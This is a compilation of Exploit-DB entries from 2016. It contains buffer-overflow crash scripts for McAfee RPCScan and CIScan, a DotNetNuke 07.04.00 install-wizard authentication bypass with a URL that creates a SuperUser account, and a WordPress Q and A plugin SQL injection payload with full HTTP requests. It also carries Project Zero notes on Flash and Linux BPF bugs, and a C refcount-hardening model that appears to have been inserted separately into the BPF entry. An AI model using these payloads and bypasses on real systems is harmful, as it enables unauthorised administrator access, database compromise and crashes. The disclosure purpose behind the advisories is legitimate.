Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : RPCScan v2.03 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/rpcscan.aspx#
# Tested Version : 2.03
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python RPCScan-BoF.py
# 2.- Open RPCScan-BoF.txt and copy content to clipboard
# 3.- Open RPCScan2.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("RPCScan-BoF.txt", "w")
f.write(buffer + eip)
f.close()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=719
There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip
# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
# Date: 06-05-2016
# Exploit Author: Marios Nicolaides
# Vendor Homepage: http://www.dnnsoftware.com/
# Software Link: https://dotnetnuke.codeplex.com/releases/view/611324
# Version: 07.04.00
# Tested on: Microsoft Windows 7 Professional (64-bit)
# Contact: marios.nicolaides@outlook.com
# CVE: CVE-2015-2794
# Category: webapps
1. Description
DotNetNuke 07.04.00 does not prevent anonymous users from accessing the installation wizard; as a result a remote attacker
can 'reinstall' DNN and obtain unauthorised access as a SuperUser.
Previous versions of DotNetNuke may also be affected.
2. Proof of Concept
The exploit can be demonstrated as follows:
If the DNN SQL database is in the default location and configuration:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- Filename: Database.mdf (This is the default database file of DNN. You can find it at \App_Data\Database.mdf)
The following URL will create an account with the username: 'host', password: 'dnnhost':
http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall
If the DNN SQL database is not in the default configuration then the attacker must know its configuration or be able to brute-force guess it.
A. Visit http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
B. Fill in the form and submit it:
Username: whatever
Password: whateverpassword
Email address: whatever@example.com (You will get an error msg due to client-side validation, just ignore it)
Website Name: Whatever Site Name
Database Setup Custom:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- This is the SQL Server instance name, which must be known or brute-force guessed in order to complete the installation.
- If the MSSQL instance is reachable over the network, auxiliary/scanner/mssql/mssql_ping from MSF can discover it.
- Filename: Database.mdf
- This is the default database file of DNN. You can find it at "\App_Data\Database.mdf".
- Tick the box Run Database as a Database Owner
C. You will probably get an error. Remove the "__VIEWSTATE=" parameter from the URL and press enter.
D. When the installation completes click Visit Website.
E. Login with your credentials.
3. Solution:
Update to version 07.04.01
https://dotnetnuke.codeplex.com/releases/view/615317
4. References:
http://www.dnnsoftware.com/platform/manage/security-center (See 2015-05 (Critical) unauthorized users may create new host accounts)
http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
# Tested Version : 1.00
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python CIScanv1-BoF.py
# 2.- Open CIScanv1-BoF.txt and copy content to clipboard
# 3.- Open CIScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("CIScanv1-BoF.txt", "w")
f.write(buffer + eip)
f.close()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=809
Most things in the kernel use 32-bit reference counters, relying on the
fact that the memory constraints of real computers make it impossible to
create enough references to overflow the counters. There are exceptions
for things like `struct file` because it is possible to create references
to them with relatively little memory usage.
Using BPF_MAP_TYPE_PROG_ARRAY maps, it is possible to create
references to BPF programs that only need sizeof(void*) bytes each
(8 bytes on amd64), permitting an overflow after filling ~32GB of memory
that is subject to RLIMIT_MEMLOCK restrictions.
The requirement for more than 32GB of RAM is relatively high, but not
impossible. The requirement that the allocations need to be below
RLIMIT_MEMLOCK is probably the bigger obstacle for exploitation: On most
Linux systems, every user is only permitted to allocate up to 64KiB of RAM.
However:
- There are systems where RLIMIT_MEMLOCK is disabled administratively.
- On systems with containers (e.g. LXC containers), usually every
container's root user has access to 2^16 different UIDs. If an attacker
has control over 9 containers and can share file descriptors between
them or has control over one container with a relatively high number
of mapped UIDs, he should be able to trigger the overflow.
The attached PoC, when run in an Ubuntu 16.04 VM with 40GB RAM and the
RLIMIT_MEMLOCK limit disabled, needs 25 minutes to execute and causes the
following oops:
[ 1850.676543] BUG: unable to handle kernel paging request at ffffc900069c5010
[ 1850.676550] IP: [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676556] PGD 9bc094067 PUD 9bc095067 PMD 9b4d2b067 PTE 0
[ 1850.676558] Oops: 0000 [#1] SMP
[ 1850.676561] Modules linked in: nls_utf8 isofs vboxsf(OE) snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event joydev snd_rawmidi snd_seq snd_seq_device snd_timer input_leds snd serio_raw soundcore vboxvideo(OE) 8250_fintek drm i2c_piix4 vboxguest(OE) mac_hid parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci fjes video e1000 pata_acpi
[ 1850.676579] CPU: 0 PID: 1861 Comm: overflow Tainted: G OE 4.4.0-21-generic #37-Ubuntu
[ 1850.676581] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 1850.676582] task: ffff8809b2fe4b00 ti: ffff8809b2f3c000 task.ti: ffff8809b2f3c000
[ 1850.676583] RIP: 0010:[<ffffffff81173525>] [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676585] RSP: 0018:ffff8809b2f3fdb8 EFLAGS: 00010286
[ 1850.676586] RAX: ffffffff81a24f20 RBX: 0000000000000000 RCX: 0000000000000001
[ 1850.676587] RDX: ffff880230ebc110 RSI: ffff880230ebc100 RDI: ffffc900069c5000
[ 1850.676588] RBP: ffff8809b2f3fdc0 R08: 0000000000000000 R09: 0000000000000000
[ 1850.676589] R10: ffff8809b55468e0 R11: ffff880230ebc110 R12: ffffc90814ce6060
[ 1850.676590] R13: ffffc90814ce6000 R14: ffff8809b5a9d1a0 R15: ffff8809b29cf480
[ 1850.676592] FS: 00007fbe54cf5700(0000) GS:ffff8809e3c00000(0000) knlGS:0000000000000000
[ 1850.676593] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 1850.676594] CR2: ffffc900069c5010 CR3: 00000009ae9ce000 CR4: 00000000000006f0
[ 1850.676598] Stack:
[ 1850.676599] ffffffff8117810e ffff8809b2f3fde8 ffffffff811783c6 ffffc90814ce6000
[ 1850.676600] 0000000000000008 ffff8809b55468e0 ffff8809b2f3fdf8 ffffffff811729bd
[ 1850.676602] ffff8809b2f3fe10 ffffffff811733b9 ffff880230ebc100 ffff8809b2f3fe58
[ 1850.676603] Call Trace:
[ 1850.676607] [<ffffffff8117810e>] ? prog_fd_array_put_ptr+0xe/0x10
[ 1850.676609] [<ffffffff811783c6>] bpf_fd_array_map_clear+0x36/0x50
[ 1850.676611] [<ffffffff811729bd>] bpf_map_put_uref+0x1d/0x20
[ 1850.676612] [<ffffffff811733b9>] bpf_map_release+0x19/0x30
[ 1850.676616] [<ffffffff8120e514>] __fput+0xe4/0x220
[ 1850.676617] [<ffffffff8120e68e>] ____fput+0xe/0x10
[ 1850.676621] [<ffffffff8109e943>] task_work_run+0x73/0x90
[ 1850.676625] [<ffffffff81083ba4>] do_exit+0x2e4/0xae0
[ 1850.676626] [<ffffffff81084423>] do_group_exit+0x43/0xb0
[ 1850.676628] [<ffffffff810844a4>] SyS_exit_group+0x14/0x20
[ 1850.676632] [<ffffffff818244f2>] entry_SYSCALL_64_fastpath+0x16/0x71
[ 1850.676633] Code: cf 00 55 48 89 e5 48 89 78 08 48 89 07 48 c7 47 08 60 55 e6 81 48 89 3d 4a 20 cf 00 5d c3 0f 1f 84 00 00 00 00 00 66 66 66 66 90 <48> 8b 47 10 3e ff 08 74 01 c3 55 48 8b 7f 10 48 c7 c6 20 2f 17
[ 1850.676649] RIP [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676650] RSP <ffff8809b2f3fdb8>
[ 1850.676651] CR2: ffffc900069c5010
[ 1850.676653] ---[ end trace 90333448b9273067 ]---
[ 1850.676655] Fixing recursive fault but reboot is needed!
I believe that this issue illustrates that reference count hardening
makes sense, even without reference leaks.
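As an added model in C (written here, not kernel code) of the point above: a plain 32-bit counter that each PROG_ARRAY slot increments wraps to a small value once enough slots hold the program, after which a handful of puts frees the object while billions of holders still point at it. A saturating counter refuses further references at a cap far below 2^32 and turns the overflow into a recoverable error, which is also the shape of the referenced fix. PROG_MAX_REFCNT here is a value chosen for the demo, and the simulation starts the counter near the top so it does not loop 2^32 times.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Cap for the hardened counter; chosen for the demo.  What matters is that
 * it sits far below 2^32, so the counter can never wrap. */
#define PROG_MAX_REFCNT 32768u

struct prog {
    uint32_t refcnt;   /* 32-bit count, like the unhardened kernel counter */
    bool freed;
};

/* Unhardened get/put: a plain 32-bit increment wraps from 0xffffffff to 0. */
static void prog_get_unchecked(struct prog *p)
{
    p->refcnt++;
}

static void prog_put(struct prog *p)
{
    if (--p->refcnt == 0)
        p->freed = true;   /* bpf_prog_put() would schedule the free here */
}

/* Hardened get: refuse the reference at the cap instead of wrapping.
 * The caller turns the false return into an error (-EBUSY style). */
static bool prog_get_checked(struct prog *p)
{
    if (p->refcnt >= PROG_MAX_REFCNT)
        return false;
    p->refcnt++;
    return true;
}

/* Simulate storing one program into `slots` PROG_ARRAY entries when the
 * counter already reads `start`, then draining references until the object
 * is freed.  Returns how many holders still point at the freed object;
 * a correct counter returns 0. */
uint64_t dangling_holders_unchecked(uint32_t start, uint64_t slots)
{
    struct prog p = { start, false };
    for (uint64_t i = 0; i < slots; i++)
        prog_get_unchecked(&p);
    uint64_t holders = (uint64_t)start + slots;   /* what the count should be */
    if (p.refcnt == 0)
        return holders;   /* wrapped exactly to zero: the next put underflows, every holder dangles */
    uint64_t puts = 0;
    while (!p.freed && puts < holders) {
        prog_put(&p);
        puts++;
    }
    return holders - puts;
}

/* Same fill with the hardened counter: returns how many references were
 * refused.  The counter never wraps, so no premature free is possible. */
uint64_t refused_refs_checked(uint32_t start, uint64_t slots)
{
    struct prog p = { start, false };
    uint64_t refused = 0;
    for (uint64_t i = 0; i < slots; i++)
        if (!prog_get_checked(&p))
            refused++;
    return refused;
}

int main(void)
{
    /* Start 32 references short of the wrap instead of filling 32 GiB of slots. */
    printf("unchecked: %llu holders left dangling after the premature free\n",
           (unsigned long long)dangling_holders_unchecked(0xffffffe0u, 64));
    printf("checked:   %llu references refused, object stays alive\n",
           (unsigned long long)refused_refs_checked(PROG_MAX_REFCNT - 10, 64));
    return 0;
}
```

The refusal is the important design choice: an attacker who can take 2^32 references can certainly take PROG_MAX_REFCNT of them, so the cap does not stop the allocation, it only guarantees that the failure is an error code rather than a use-after-free.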
A suggested patch (compile-tested) is attached.
Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/kernel/bpf?id=92117d8443bc5afacc8d5ba82e541946310f106e
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39773.zip
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/q-and-a"
# Date: 12-05-2016
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
# Version: 1.3.9.7 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
The plugin was originally named "Q and A FAQ" and developed by the Raygun company;
it has since evolved and been renamed "Q and A Focus Plus FAQ" by Lanexatek Creations.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
##### SQL Injection #####
These vulnerabilities are mitigated by the fact that you must be logged in as an administrator to exploit them.
The hdnParentID parameter is vulnerable in two places (time-based blind injection, hence the SLEEP payload).
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=759
There is a use-after-free in MovieClip.duplicateMovieClip. If an action associated with the MovieClip frees the clip provided as the initObject parameter to the call, it will be used after it is freed. A PoC is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39779.zip